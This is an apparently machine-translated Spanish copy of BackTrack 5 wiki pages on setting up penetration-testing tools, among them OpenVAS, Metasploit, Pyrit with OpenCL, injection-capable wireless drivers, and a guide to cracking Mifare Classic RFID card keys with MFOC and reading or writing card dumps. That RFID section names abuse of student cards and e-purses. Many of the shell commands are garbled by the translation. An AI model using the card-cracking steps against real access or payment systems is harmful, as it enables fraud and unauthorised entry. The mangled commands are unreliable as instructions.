Una vez que el guin est terminado se le presentar con un mensaje que le indica que debe
iniciar su Fluxbox.

Sin embargo antes de que reinicie hay una cosa que tenemos que hacer, vamos a tener que hacer
saber a ejecutar BackTrack FluxBox sobre el comando startx y no es por defecto WM.
root @ bt:. ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc
root @ bt: ~ # shutdown-r 0

Reinicie el BackTrack y FluxBox enjoy!

NOTA: Para volver a la configuracin predeterminada WM todo lo que tienes que hacer es eliminar el
archivo xinitrc..
root @ bt:. ~ # rm-rf ~ / xinitrc
root @ bt: ~ # shutdown-r 0

Instale Flash Player

Instale Flash Player


Como te habrs dado cuenta de Flash Player no funciona en Backtrack 5, por lo que para
solucionar este problema, primero tenemos que quitar el reproductor de flash actual emitiendo los
siguientes comandos:
root @ bt: ~ # apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common
mozilla-plugin-gnash swfdec-mozilla
root @ bt: ~ # rm-f / usr / lib / firefox / plugins / * flash *
root @ bt: ~ # rm-f / usr / lib / firefox addons-/ plugins / * flash *
root @ bt: ~ # rm-f / usr / lib / mozilla / plugins / * flash *
root @ bt: ~ # rm-f ~ / .mozilla / plugins / * flash * so
root @ bt: ~ # rm-rfd / usr / lib / nspluginwrapper

Despus de quitar flash que necesita para obtener el reproductor de flash de nuevo el oficial [
http://www.adobe.com/software/flash/about/ sitio web]. (Descargar en formato tar.gz)
Lo siguiente que se har cargo del reproductor de Flash:
root @ bt: ~ # mkdir-p ~ / .mozilla / plugins
root @ bt: ~ # mkdir Flash
root @ bt: ~ # mv-f install_flash_player_11_linux.i386.tar.gz flash /
root @ bt: ~ # cd flash /
root @ bt: ~ / flash # tar install_flash_player_11_linux.i386.tar.gz xvfz
root @ bt: ~ / flash # cp-f libflashplayer.so ~ / .mozilla / plugins /

Podemos probar si funciona Flash Player aqu .

ADVERTENCIA: Asegrese de configurar correctamente o NOSCRIPT TUS VIDEOS FLASH NO


FUNCIONA!

Instale OpenCL

Instale OpenCL en Backtrack


Este artculo fue contribuido por g0tmi1k.
Twitter: ! https://twitter.com/ # / g0tmi1k
En esta gua vamos a instalar y configurar OpenCL en Backtrack.
NOTA: Es posible que tenga que hacer algunos ajustes menores en funcin de su sistema.

Empecemos:
En primer lugar antes de empezar queremos asegurarnos de que nuestro sistema est actualizado.
root @ bt: ~ # apt-get update && apt-get upgrade

Antes de continuar con la instalacin de los controladores de ATI que necesitamos para que
nuestro cdigo fuente del kernel preparado.
root @ bt: ~ # preparar-kernel-sources
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / genera / * include / linux /

Ahora que estamos preparados es el momento de descargar los drivers de ATI.


root @ bt: ~ # wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-9-x86.x86_64.run
root @ bt: ~ # chmod + x ati-driver-installer-11-9-x86.x86_64.run
root @ bt: ~ # ./ati-driver-installer-11-9-x86.x86_64.run
root @ bt: ~ # reboot

Antes de que termine hay una cosa ms que tenemos que instalar, el AMD Accelerated Parallel
Processing (APP) SDK, ste debe ser instalado de acuerdo con la arquitectura de CPU.
Para la arquitectura de 32 bits:
root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx32.tgz
root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx32.tgz
root @ bt:. ~ # / Install-AMD-APP.sh

Para la arquitectura de 64 bits:


root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDK-v2.5-lnx64.tgz
root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5-lnx64.tgz
root @ bt:. ~ # / Install-AMD-APP.sh

Tambin necesitaremos cmake y cmake + + junto con algunos archivos de la biblioteca.


En primer lugar, instalar las bibliotecas y cmake:
root @ bt: ~ # apt-get install libroot-python-dev libboost-python-dev zlib1g-dev libssl-dev cmake
libboost1.40-all-dev

Antes de poder instalar cmake + + tenemos que establecer las rutas de ATI Stream:
root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP
root @ bt:. ~ # export ATISTREAMSDKROOT ">> ~ / bashrc
root @ bt:. ~ # source ~ / bashrc

Ahora podemos proceder con la instalacin:


root @ bt: ~ # svn co https://calpp.svn.sourceforge.net/svnroot/calpp calpp
root @ bt: ~ # cd calpp / trunk
root @ bt: ~ # cmake.

root @ bt: ~ # make


root @ bt: ~ # make install

Adems ahora podemos instalar Pyrit con la opcin OpenCL.


root @ bt: ~ # svn checkout http://pyrit.googlecode.com/svn/trunk/ / tmp / root @ bt Pyrit: ~ # cd /
tmp / Pyrit / Pyrit && python setup.py construir && python setup.py install root @ bt: ~ # cd / tmp /
Pyrit / && cpyrit_opencl python setup.py construir && python setup.py install

Ahora podemos probar Pyrit.


root @ bt: ~ # Pyrit list_cores
root @ bt: ~ # Pyrit punto de referencia

Recopilacin de informacin

Autoscan - Unicornscan

Autoscan

Configuracin de escaneo automtico en Backtrack 5


Cul es Autoscan?
En Autoscan corto es una red de descubrimiento y gestin de aplicaciones. Su propsito principal es
identificar rpidamente las mquinas conectadas / equipo en un entorno de red.

Vamos a configurar rpidamente autoscan en Backtrack5, puede encontrarlo mediante el men en:
BackTrack -> Recopilacin de Informacin -> Anlisis de Red -> Red Scanners -> autoscan

Tan pronto como iniciarlo desde el men comenzaremos nuestro asistente de configuracin, haga
clic en Siguiente para continuar:

Ahora vamos a configurar una nueva red y aadir nuestros propios datos haciendo clic en el
botn Aadir:

Seleccione la interfaz de red (wlan0 en este caso):

Despus de que se nos pide para confirmar nuestros valores:

Aqu hay alguna salida similar a lo que se ve en algunos dispositivos:

Unicornscan

Unicornscan es un impresionante "remitente carga til", que tambin puede actuar como un escner
asncrona. Gracias a dash1b y su guin impresionante parche en marcha, hemos sido capaces de
implementar rpidamente las caractersticas completas del escner en BackTrack 5. Para instalar
unicornscan en BackTrack 5 (si no est ya instalado), escriba:

root @ bt: ~ # apt-get update


root @ bt: ~ # apt-get install unicornscan

A continuacin, ejecute la secuencia de comandos de configuracin de postgres, que fue tomada en su


mayora de http://code.google.com/p/unicornscan-bt5-install-script/ . Este script configurar el servidor
PostgreSQL Framework3 como la base de datos back-end para Unicornscan.
Iniciar apache, y vaya a http://127.0.0.1/unicornscan . Iniciar una exploracin utilizando la opcinepgsqldb.

Pgina
Casa
Foros
Blog
Formacin
Descargas
Sobre

Introduccin>
Kernel>
Personalizacin>
Recopilacin de informacin>
Vulnerabilidad Identificacin>
Explotacin>
Radio Network Analysis>
Privilege Escalation>
Telefona>
Forense>
Errores conocidos BackTrack
Preguntas ms frecuentes

Caja de herramientas

Lo que enlaza aqu


Seguimiento de enlaces
Pginas especiales
Versin para imprimir
Enlace permanente

Vulnerabilidad de identificacin

OpenVAS

Primeros pasos con OpenVAS

Contenido
[hide]
1
Instalacin
de
OpenVAS
2
Ubicacin
de las
entradas
del men
OpenVAS
3
OpenVAS
comprobar
la
configuraci
n
4
Configurac
in de
OpenVAS
4.1
Pas
o 1.
A
adir
un
usu
ario
4,2
Pas
o 2.
Hac
er
el
Cer
tific
ado
4.3
Pas
o 3.
La
sinc
roni
zaci
n

Instalacin OpenVAS
La forma ms sencilla de instalar todos los componentes necesarios de la suite openvas es emitir los
mandatos siguientes en una ventana de terminal.
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get install openvas

Los openvas paquete es un "maestro" paquete que contiene toda la informacin necesaria para descargar
automticamente todos los paquetes que componen la suite completa de herramientas de openvas.

Ubicacin de las entradas del men OpenVAS


Una vez que se ha instalado openvas usted encontrar todo el de las entradas de men en esta localidad.

OpenVAS comprobar la configuracin


openvas-check-setup es una herramienta muy til, aqu se muestra cmo se puede ayudar a diagnosticar
problemas y dar consejos sobre cmo solucionarlos.

Configuracin de OpenVAS
Paso 1. Aadir un usuario
En el men, seleccione OpenVAS Adduser y siga las instrucciones.
Tenga en cuenta que puede utilizar cualquier nombre de usuario que quiera, pero en este caso he usado la
raz. Lo he dejado en el valor predeterminado de autenticacin de contrasea como voy a usar esto en una
mquina local y para evitar tener que preocuparse acerca de los usuarios que tienen certs de qu
preocuparse, pero esto es totalmente de usted. No se puede tener una contrasea vaca, as que he
utilizado Toor en este caso. Para las reglas que se aplican a este usuario he dejado en blanco presionando
ctrl-d Esto significa que este usuario ser capaz de realizar cualquier tarea sin ningn tipo de
restricciones.

Paso 2. Hacer el Certificado


En el men, seleccione OpenVAS mkcert y siga las instrucciones.
Aqu vamos a crear el certificado SSL Esto se utiliza si usted decide utilizar cert lugar de paso al crear el
usuario, pero estn obligados a crear todos modos, incluso si usted decide no utilizar certs.

Paso 3. La sincronizacin de la NVT


En este punto tenemos que conseguir la ltima serie de NVT. Estos son los que el analizador usa para
detectar las vulnerabilidades en lo que va a escanear. Por favor, tenga en cuenta que tendr que hacer esto
con bastante regularidad, y la primera vez que haces podra tardar un tiempo dependiendo de la velocidad
de su ordenador y de Internet.
As que seleccione OpenVAS NVT Sync en el men

Paso 4. Puesta en marcha del escner


Comience escner OpenVAS
Ahora estamos listos para iniciar el escner
Esto tomar un tiempo la primera vez que lo inicie como lo comprueba y carga el nuevo NVT ha
descargado en el paso anterior.

Tenga en cuenta el tiempo en la esquina! Esto fue en una mquina virtual de lo que debe ser mucho ms
rpido para usted.
Arranques posteriores ser rpido a menos que no haya actualizado en bastante tiempo
Por favor, recuerde que el escner se ejecuta como un demonio en el fondo y seguir funcionando hasta
que se reinicie o pararlo con la entrada de men proporciona.

Paso 5. Configuracin OpenVAS gerente


Configuracin de administrador openvas
Lo primero que tenemos que hacer es hacer un certificado de cliente para el gestor de OpenVAS, Esto se
hace ejecutando el siguiente comando
openvas-mkcert-client-n om-i

ahora tenemos que reconstruir la base de datos, ya que ahora est fuera de fecha con el agregado de nvt y
que de otra manera sera obtener errores sobre la base de datos. Usted debe hacer esto cada vez que
actualice el de NVT. Esto se hace con un simple comando
openvasmd - rebuild

Este proceso slo tomar unos segundos si se utiliza OpenVAS bibliotecas de la versin 4.0.3 o inferior.
Este proceso puede tomar mucho ms tiempo si se utiliza OpenVAS bibliotecas de la versin 4.0.5 o
superior. La desventaja de este tiempo extra es mucho mayor capacidad de exploracin, por lo que vale la
pena.

Paso 6. Configuracin OpenVAS Administrador


Configuracin de Administrador OpenVAS
Tenemos que crear un usuario administrativo que vamos a utilizar para realizar todas evaluacin
contemplaba nuestra vulnerabilidad. Esto se hace ejecutando el siguiente comando
openvasad-c 'add_user'-n-r openvasadmin administracin

openvasadmin es el nombre que he elegido para convertirse en el usuario, sin embargo, puede sustituir
eso con algo ms adecuado para usted si as lo desea. Asegrese de que puede recordar este nombre de
usuario y la contrasea asociada, ya que lo necesitar cuando ejecute openvas.
root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin administracin
Palabra clave:
anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: No hay reglas expediente previsto, el

nuevo usuario no tendr restricciones.


anuncio principal: MENSAJE :5871:2011-05-26 04h57.08 BST: openvasadmin usuario se ha creado
correctamente.
root @ bt: ~ #

Iniciar el Administrador OpenVAS


Ahora tenemos que iniciar el Administrador de OpenVAS
Se ejecuta como un daemon en segundo plano. Como estoy corriendo desde mi mquina local que va a
utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace mediante la
ejecucin del siguiente comando.
openvasmd-p 9390-un 127.0.0.1

A partir Administrador OpenVAS


Ahora tenemos que iniciar el Administrador de OpenVAS
Esto tambin se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi mquina
local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace
mediante la ejecucin del siguiente comando.
openvasad-a 9.393 127.0.0.1-p

A partir Greenbone Asistente de seguridad


Ahora tenemos que empezar a Greenbone Asistente de seguridad
De nuevo, esto se ejecuta como un demonio en segundo plano. Como estoy corriendo desde mi mquina
local que va a utilizar para escuchar en localhost y, en este caso, el puerto por defecto. Esto se hace
mediante la ejecucin del siguiente comando.
GSAD - http-only - listen = 127.0.0.1-p 9392

Ms informacin sobre estos comandos y otras opciones se pueden encontrar mediante la ejecucin de su
entrada en el men asociado y mirando las pginas de manual. Como los tres de estos anlisis como un
demonio y seguir funcionando hasta que se cierre su computadora, me han proporcionado las entradas
de men para usted de modo que usted puede detenerlos cuando ya no los necesite.
En este punto de la instalacin es prcticamente completa, pero como hemos llegado hasta aqu bien
podemos seguir para asegurarse de que todo est funcionando como se esperaba.

OpenVAS interfaces de usuario


Greenbone seguridad de escritorio
Ahora tenemos que iniciar una aplicacin para que pueda comunicarse con el escner y otros demonios.
La primera de estas opciones es Greenbone seguridad de escritorio

Inicie esto desde la opcin de men y rellenar las credenciales y los detalles que hemos creado
anteriormente, a continuacin, haga clic en el botn de inicio de sesin.
Una vez conectado usted puede utilizar esto como su interfaz de exploracin, o utilizar la opcin
siguiente de que usted prefiera.

Interfaz web
El siguiente mtodo es a travs de una interfaz web
Abra su navegador favorito y escriba la siguiente direccin
127.0.0.1:9392
A continuacin se le presentar una pgina de inicio de sesin. iniciar sesin con las credenciales que
hemos creado antes.
Una vez que haya iniciado la sesin, se dar cuenta de que su uso de la CPU se golpe el techo, no se
preocupe, este volver a la normalidad en poco tiempo.
Aqu puede realizar y configurar todas las tareas de escaneo. Es una buena idea establecer NoScript para
permitir temporalmente 127.0.0.1 o puede obtener resultados inesperados.
Hay mucho ms para OpenVAS que he incluido aqu, pero esto es slo la intencin de poner en marcha
rpidamente. Analiza y configuraciones ms avanzadas estn ms all del alcance de este tutorial simple.
No se olvide de algunas de las otras partes a openvas contenidos en el men que no he tratado aqu y
tambin las pginas de manual.

Una vez que haya completado el proceso de configuracin


OpenVAS que comienzan con Greenbone de seguridad de escritorio como la
interfaz de anlisis
En el men, seleccione
OpenVAS NVT sincronizacin
Comience escner OpenVAS
a continuacin, en una ventana de terminal
openvasmd - rebuild
openvasmd-p 9390-un 127.0.0.1
openvasad-a 9.393 127.0.0.1-p
GSAD - http-only - listen = 127.0.0.1-p 9392

Luego, desde el men


Comience Greenbone seguridad de escritorio
y login
Ahora est listo para configurar tareas de exploracin.

OpenVAS A partir de un navegador web como interfaz de escaneo


En el men, seleccione
OpenVAS NVT sincronizacin
Comience escner OpenVAS
a continuacin, en una ventana de terminal
openvasmd - rebuild
openvasmd-p 9390-un 127.0.0.1
openvasad-a 9.393 127.0.0.1-p
GSAD - http-only - listen = 127.0.0.1-p 9392

A continuacin, abra su navegador a la direccin


http://127.0.0.1:9392

Login.
Ahora est listo para configurar tareas de exploracin.

Metasploit Framework MySQL

Metasploit Framework con soporte MySQL


Con una reciente correccin de errores, hemos simplificado los pasos necesarios para utilizar MySQL
como back-end para el Metasploit Framework.
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get dist-upgrade
root @ bt: ~ # mysql servicio de inicio
root @ bt: ~ # msfconsole

Un comando db_driver debe mostrar la disponibilidad de la opcin de MySQL:


msf> db_driver
[*] Driver activo: postgresql
[*] Disponible en: postgresql, mysql

msf>
Vaya por delante y conectarse a la base de datos utilizando la contrasea de root por defecto de MySQL
Toor:
msf> db_driver mysql
[*] El uso de bases de datos mysql conductor
msf> root db_connect: toor@127.0.0.1 / msf3
msf>

Radio Network Analysis

Wireless Drivers

Wireless Drivers

Con el escenario siempre cambiante del mundo del controlador inalmbrico y el mac80211 pila, hemos
querido dedicar una pgina que resolver algunas configuraciones complicadas inalmbricos
controladores. Antes de iniciar su viaje hacia BackTrack mundo inalmbrico, primero debe identificar el
chipset de la tarjeta inalmbrica con un 100% de certeza. En caso de duda, usted siempre se puede
intentar de enchufar el tarjeta en una casilla de Linux, y ver lo que dmesg tiene que decir.

Contenido
[hide]
1
BackTrack
5 r2
1.1
b43
2
BackTrack
5 r1
2,1
rt28
00u
sb
3
BackTrack
5
3.1
Wir
eles
s
Dri
ver
s

3
3.2
Tarj
etas
inal
m
bric
as

BackTrack 5 r2
BackTrack 5 R2 contiene imgenes del kernel parcheado 3.2.6 controladores inalmbricos con varios
parches de inyeccin aplicados.

b43
BackTrack 5 R2 ha pasado de b43 conductores a los conductores brcmsmac. Si necesitas habilitar los b43
controladores, siga esta gua - http://www.backtrack-linux.org/wiki/index.php?
title=Enable_b43_drivers_in_Backtrack5_r2 .

BackTrack 5 r1
BackTrack 5 R1 contiene parches del kernel 2.6.39.4 del stock controladores inalmbricos con varios
parches de inyeccin aplicados. Dependiendo de la tarjeta y la configuracin, estos controladores no le
conviene.

rt2800usb
En algunos casos hemos visto las tarjetas que utilizan los controladores rt2800usb (como el
AWUS036NH y Alfs AWUS036NEH) actuar extrao con el kernel BT5R1. Si esto le sucede a usted,
usted puede intentar instalar un reciente compat-wireless y construir por su cuenta. Esta versin
especfica funcionar:
root @ bt: ~ # ln-s / usr / src / linux / lib/modules/2.6.39.4/build
root @ bt: ~ # cd / usr / src /
root
root
root
root
root
root
root
root
root
root
root

@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:
@ bt:

~ # tar jxpf compat-wireless-2011-07-14.tar.bz2


~ # wget http://www.backtrack-linux.org/2.6.39.patches.tar
~ # tar xpf 2.6.39.patches.tar
~ # cd compat-wireless-2011-07-14
~ # patch-p1 <.. / patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
~ # patch-p1 <.. / patches/mac80211.compat08082009.wl_frag + ack_v1.patch
~ # patch-p1 <.. / patches/zd1211rw-2.6.28.patch
~ # patch-p1 <.. / patches/ipw2200-inject.2.6.36.patch
~ # make
~ # make install
~ # reboot

BackTrack 5
BackTrack 5 contiene imgenes del kernel 2.6.38 parcheado controladores inalmbricos, as como varios
conductores "externos". Algunos de estos controladores se solapan, para proporcionar una flexibilidad
mxima con varios ataques inalmbricos. El archivo / etc / modprobe.d / blacklist dicta que los
conductores preferidos se cargan al arrancar el sistema. En trminos generales, todos los conductores de
edad avanzada IEEE estn en listas negras y tienen que cargarse manualmente si quieres usarlos.

Wireless Drivers
rtl8187 vs r8187
Esto es confuso. El rtl8187 es el conductor de pila mac80211, mientras que el r8187 es el antiguo
controlador IEEE. Tanto el apoyo de la inyeccin. Los ms nuevos mac80211 RTL8187 conductores
parecen tener un desagradable error en VMWare. Para obtener ms informacin acerca de estos
controladores visite nuestro rtl8187 vs r8187 pgina.

compat wireless
Como Linux controladores inalmbricos maduro, ms chipsets se aaden a la lista de compatibilidad. Si
ninguno de los controladores del ncleo nativo BackTrack trabajar para usted, es posible que desee
considerar el uso de una versin ms reciente de compat-wireless.
Echa un vistazo a la compat-wireless pgina para obtener informacin sobre cmo obtener los drivers y
funcionando.

Tarjetas inalmbricas
ESTA LISTA DEBE SER ACTUALIZADO PARA BT5.

Tarjetas Probado y de trabajo


Hemos sido capaces de poner a prueba las siguientes tarjetas. Tenga en cuenta que "pas" significa "pasar
un aireplay -9" prueba de inyeccin. Estaremos ampliando esta lista a medida que ms cpulas de
retroalimentacin forman la comunidad. De nuestras pruebas hemos encontrado que los conjuntos de
chips ms importantes fueron apoyados, as como las tarjetas ms comunes.

AWUS036H (rtl8187, r8187) - ambos pilotos mac80211 y IEEE - aprobada


AWUS036NH (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada
BCM4312 802.11b / g LP-PHY (rev 01) - usando el mac80211 b43, funciona bien - aprob
N3 Rockland - (Ralink RT2870/3070) - usando los drivers mac80211 rt2x00usb - aprobada
Edimax EW-7318USg USB - (Ralink RT2501/RT2573) - usando los drivers mac80211
rt2500usb/rt73usb - aprobada
Asustek Computer, Inc. RT2573 - usando los drivers mac80211 rt2500usb/rt73usb - aprobada
Linksys WUSB54GC ver 3 - utilizando los drivers mac80211 rt2800usb - aprobada
Ubiquiti SRC - usando el ath9k mac80211 conductores de paso obligatorio
Interna Intel Corporation PRO / Wireless 3945ABG - usando el iwl3945 mac80211 conductores
de paso obligatorio
Dlink WNA-2330 PCMCIA - usando el ath5k mac80211 conductores de paso obligatorio
Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express) (rev 01) usando el ath9k mac80211 conductores de paso obligatorio
Netgear WG111v2 - usando el rtl8187 mac80211 conductores de paso obligatorio
ZyXEL AG-225H v2 - utilizando los drivers mac80211 ZD1211 - aprobada
Intel 4956/5xxx - utilizando los controladores iwlagn - aprobada

Trabajo, sin inyeccin


Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)
Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)

NO tarjetas de trabajo
D-Link DWL-122 - utilizando los drivers mac80211 prism2_usb - fail
Linksys WUSB600N v2 - utilizando los drivers mac80211 rt2800usb - fail
AWUS051NH - fail

RFID Mifare Classic Cocinando con

Este artculo fue contribuido por MI1.


URL: http://hack4fun.eu
Twitter: ! http://twitter.com/ # / mi1c00k
Email: fblubr@gmail.com

Contenido
[hide]
1 RFID
Mifare
Classic
Cocinando
con
2 0x00 Prefacio
2.1
De
pen
den
cias
3 0x01 Hardware
3,1
tou
cha
tag
AC
R1
22
U
4 0x02 Software
4,1
AC
R1
22
U
con
duc
tor
4,2
de
cd
igo
abi
erto
Nea
r
Fiel
d
Co
mm

RFID Mifare Classic Cocinando con


DESCARGO DE RESPONSABILIDAD: La informacin y la implementacin de referencia se
proporciona:
Para fines informativos nicamente como parte de estudios acadmicos o de investigacin,
especialmente en el campo de la seguridad de informacin, criptografa y sistemas de seguridad
Tal cual, sin ningn tipo de garanta, el apoyo o la responsabilidad - de los daos o consecuencias
obtenidas como resultado de la consulta de esta informacin si puramente del lado del lector
NO deben utilizarse en circunstancias ilegales (por ejemplo, para abusos, hack o truco de un
sistema que el lector no tiene autorizacin especfica a como los sistemas de venta de entradas,
transporte pblico, tarjetas de Universidad / CIIU, la construccin de sistemas de acceso o
sistemas que utilizan ningn tipo Mifare Classic como La tecnologa de ncleo)
NOTAS:
Este artculo contiene ninguna investigacin original. Toda la investigacin y la aplicacin fue
hecha por otras personas y las comunidades, y est disponible al pblico. Hicimos esto dos
centavos por diversin y porque amamos BackTrack.
Esto no es una gua AZ fin de tratar ms duro!

0x00 - Prlogo
Algunos de ustedes pueden haber ledo que el propio algoritmo simtrico de claves criptogrficas de la
tarjeta MIFARE Classic se ha roto. La tarjeta MIFARE Classic se utiliza en los sistemas de control de
acceso fsico (PACS) y los sistemas de pago sin contacto (incluyendo peaje y sistemas de transporte
pblico). Segn algunas estimaciones, hay 500 millones de tarjetas MIFARE desplegados en todo el
mundo, y la mayora de ellos son las tarjetas MIFARE Classic.

Mifare Classic es un bajo costo, de nivel de entrada chip, basado en la norma ISO / IEC 14443 Tipo A,
1kB o 4KB. Utiliza el estndar de 13,56 Mhz tarjeta inteligente sin contacto, CRYPTO1 propietario con
48 teclas bits. No hay proteccin contra la clonacin o modificaciones. Cualquier persona con 50 lector
puede usar esta debilidad contra su infraestructura. Al menos un sector siempre se cifra con la clave por
defecto. Despus de agrietamiento todas las claves, los hackers son capaces de cambiar el nombre,
nmero de estudiantes universitarios, la fecha de caducidad ... Este libro de cocina es una prueba de
concepto de lo fcil que se puede hacer. Ingredientes elegidos: Backtrack | touchatag paquete inicial
Probado en: BackTrack 4 R2, BackTrack 5 Final, (32 bits)

Dependencias
root @ bt: ~ # apt-get install flex libpcsclite-dev libusb-dev checkinstall

0x01 - Hardware
Touchatag - ACR122U
Touchatag es ACS ACR122 (U) NFC lector RFID USB Reader. El lector USB funciona a 13,56 MHz
(alta frecuencia RFID) y tiene una distancia de lectura de aproximadamente 4 cm (1 pulgada) cuando se
utiliza con las etiquetas RFID touchatag. Este producto est fabricado por Advanced Card Systems
Limited y parece estar disponible en diferentes configuraciones de hardware, pero no difiere mucho.
Todos ellos estn usando un chip NFC PN532 Controller y una unidad ST7 microcontrolador.

0x02 - Software
ACR122U conductor
root @ bt: ~ # wget
http://www.acs.com.hk/drivers/eng/ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root @ bt: ~ # unzip-d acr122u ACR122U_driver_Lnx_Mac10.5_10.6_1.02_P.zip
root @ bt: ~ # cd acr122u
root @ bt: ~ # tar-jxvf acsccid-1.0.2.tar.bz2
root @ bt: ~ # cd acsccid-1.0.2
root @ bt:. ~ # / configure
root @ bt: ~ # make
root @ bt: ~ # checkinstall-D-y - instalar

Open Source Near Field Communication (NFC) Library / LIBNFC /


Libnfc es la primera libre SDK y API NFC Programadores publicado bajo la licencia GNU Lesser
General Public.
root @ bt: ~ # apt-get install-y debhelper && libtool wget http://libnfc.googlecode.com/files/libnfc1.4.2.tar.gz root @ bt: ~ # tar xfvz libnfc-1.4.2 tar.gz. && cd libnfc-1.4.2 root @ bt: ~ # svn checkout
http://libnfc.googlecode.com/svn/tags/libnfc-1.4.2/debian root @ bt: ~ # dpkg-buildpackagerfakeroot root @ bt:. ~ # dpkg-i .. / libnfc * deb

Revise su lector / target con nfc-list.


root @ bt: ~ # nfc-list
nfc-list uso libnfc 1.4.2 (r891)
Conectado al dispositivo NFC: ACS ACR122U 00 00 / ACR122U103 - PN532 v1.6 (0x07)
1 ISO14443A objetivo pasiva (s) fue encontrado:
ATQA (SENS_RES): 00 02
UID (NFCID1): xx xx xx xx
SAK (SEL_RES): 18

Si el lector es rechazada por el firmware (mensaje de registro: "Firmware (xy) es falso") acaba de
desactivar la comprobacin de versin. Todo lo que necesitas hacer es cambiar ifdDriverOptions (lnea 55
en Info.plist) para omitir la comprobacin de versin de esta manera:

root @ bt: ~ # nano / usr / lib / pcsc / drivers / IFD-ccid.bundle / Contenidos / Info.plist
ifdDriverOptions
0 0005

A continuacin, reinicie el demonio pcscd y su lector touchatag deben ser reconocidos y listo.

MFOC-Mifare Classic Cracker Desconectado


Mifare Classic Desconectado Cracker es una herramienta que puede recuperar claves de tarjetas Mifare
Classic. Gracias a Norbert Szetei y Luptak Pavol para la implementacin de su ataque. MFOC es utilidad
para calcular (crack) todas las teclas (A y B) para todos los sectores, proporcionando al menos una de las
claves que ya se conoce. Archivo de claves es el archivo donde se almacenar mfoc teclas rotas. Formato
de archivo que sea compatible con la tecnologa NFC mfclassic, as que usted puede utilizar para
deshacerse de la tarjeta en un archivo o escribir un volcado en la tarjeta.
root @ bt: ~ # wget http://nfc-tools.googlecode.com/files/mfoc-0.10.2.tar.gz && tar-xvzf mfoc0.10.2.tar.gz
root @ bt: ~ # cd mfoc-0.10.2
root @ bt: ~ # autoreconf-vis
root @ bt:. ~ # / configure
root @ bt: ~ # make
root @ bt: ~ # checkinstall-D-y - instalar

0x03 - Dumping y Cocina


psscd coordina la carga de los drivers para lectores de tarjetas. Permite a las aplicaciones acceder a
tarjetas inteligentes y lectores sin conocer los detalles de la tarjeta o el lector. Es un gestor de recursos
que coordina las comunicaciones con lectores de tarjetas inteligentes y las tarjetas inteligentes y tokens
criptogrficos que estn conectadas al sistema. Yo prefiero empezar pcscd en primer plano (sin demonio)
con pcscd-f. Entonces es el momento de empezar a mfoc. Usar nmero elevado de sondas, porque el
nmero predeterminado de sondas para una clave de recuperacin para un sector es 20. Craqueo enteras
podran tardar de 30 minutos a 30 horas.

Tambin puede utilizar el parmetro-k clave, para agregar una clave a la lista de claves conocidas, que
est siendo juzgado en contra de su tarjeta en la fase inicial. La opcin-k de alguna manera no me
funcion, as que siempre compilar mis claves conocidas directamente en Buscar mfoc.c "Matriz de
teclas por defecto Mifare Classic" No estoy seguro acerca de otros pases, pero en el pas donde vivo
teclas son las mismas . Una vez que tenga las llaves de todos los sectores, debe ser capaz de utilizar
RFID-Fu contra otras tarjetas, lo cual es epic fail.
root @ bt: ~ # nfc-mfclassic - ayuda
Uso: nfc-mfclassic r | wa | b <dump.mfd> [<keys.mfd>]

r | w - Realizar leer (r) o escribir (w) tarjeta


A | B - Utilice las teclas A o B para la accin
<dump.mfd> - Dump MiFare (MFD) que se utiliza para escribir (tarjeta de MFD) o (MFD a la tarjeta)
<keys.mfd> - MiFare Dump (MFD) que contienen las teclas (opcional)
O bien: nfc-mfclassic x <dump.mfd> <payload.bin>
x - Extracto de carga til (bloques de datos) de MFD
<dump.mfd> - MiFare Dump (MFD) que contiene la carga til quera
<payload.bin> - Binary carga de archivos donde se extraern

Tenga en cuenta que los UID de la tarjeta no se ver afectada (no cambia) con este proceso. Compre
algunas tarjetas en blanco o III Proxmark si eso es lo que quieres. Si usted est pensando ahora vertido su
monedero electrnico inmediatamente despus de la recarga y cuando el crdito llega a cero, escribir el
contenido de nuevo, por favor, no lo hagas. Qu se puede dejar de hacer eso? Bueno, probablemente
slo su conciencia, pero si la tarjeta se bloquea en 24 horas despus del primer uso y luego no te quejes.
S, hay control en lnea y facturacin de los sistemas que hay para tarjetas bsicas.

0x04 - ISIC Issue


Con ISIC-International Student Identity Card atacante puede abusar de las diez de servicio no slo uno.
Tarjetas ISIC son ampliamente utilizados para el transporte de entrada, comedor, pagos y servicios varios
otros o descuentos. De acuerdo a la pgina principal hay 4,5 millones de tarjetahabientes en 120 pases.
Las tarjetas deben ser sustituidas por otras ms seguras tipos ASAP. Se puede hacer mucho ms que eso,
pero suficiente para la demostracin vamos a jugar un poco ...
En algunas universidades, slo hay un control de seguridad de la entrada - ISIC. Como se puede ver que
esto es trivial que quiere evitar. Hicimos muchas pruebas con los sistemas de transporte pblico y con los
sistemas universitarios. Los resultados son todos iguales - esos sistemas son fciles de piratear.

0x06 - Conclusin
Por ltimo, cundo la gente a aprender la leccin? Los algoritmos criptogrficos deben ser pblicos para
que puedan ser analizado y probado. Algoritmos secretos no son ms valiosos porque son secretos.
Cualquier persona que necesite una tarjeta inteligente alta seguridad debe asegurarse de que hay
seguridad en capas y no slo depende de la encriptacin del chip.

0x07 - Qu ser lo prximo?


Desde que tengo acceso a Proxmark III, que es universal herramienta de hacking RFID que puede
